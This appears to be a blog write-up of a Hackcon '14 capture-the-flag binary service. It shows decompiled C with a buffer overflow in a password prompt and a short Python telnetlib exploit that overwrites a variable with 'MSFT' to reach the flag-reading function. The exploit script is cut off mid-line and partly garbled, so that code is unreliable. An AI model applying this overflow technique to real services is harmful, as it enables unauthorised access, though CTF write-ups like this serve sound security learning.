Hackcon ’14 binary services

Service 1

We lately (just 2 hours before the contest was about to end) figured out that there were binary 3 services running on the server. And we were able to exploit just before the contest ended.

This is the link to the binary file:

After decompyling the binary, we were able to figure out theory behind the exploit. But as the “raw” socket service was running on a windows server, it took us a long time to figure out “how to exploit”.

  char Str2;
  int v13; 
  int v14; 
  int v15; 

  Str2 = 0;
  v14 = send(s, "Please enter your password: ", 28, 0);
  if ( v14 == -1 )
  {
    v1 = WSAGetLastError();
    printf("send failed with error %d\n", v1);
  }
  v15 = recv(s, &Str2, 36, 0);
  if ( v15 > 0 && v15 < 512 )
  {
    if ( v13 == 'TFSM' )
      read_flag(s);
    else
      read_flag_2(s, &Str2, 32);
  }

Telnet, python sockets etc didn’t work. And finally one of the admins published a hint that putty would be good choice to exploit it. Python telnetlib worked for us finally.
The POC: Our goal is to get the control to the function read_flag() which doesn’t check the password which we are passing. Str2 is 1 byte, we have v15, v14 and v13 on top of Str2. And we need to fill in v13 with TFSM.
Exploit:

import telnetlib, sys
attack_ip = '127.0.0.1'
port = 37517
exploit = "MSFT"*9

con = telnetlib.Telnet(att
con.read_until(':') + "\n"
con.write(exploit + "\n")

Which would print flag like this:

adjfgasdjkfgaskjdfgjkasdhgfhkajs

Hence we lost $500*N*T (N=number of time flags planted in our vuln machine, T=Total no of teams-1) points by not solving this on time.

Service 2

(will be update soon)

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s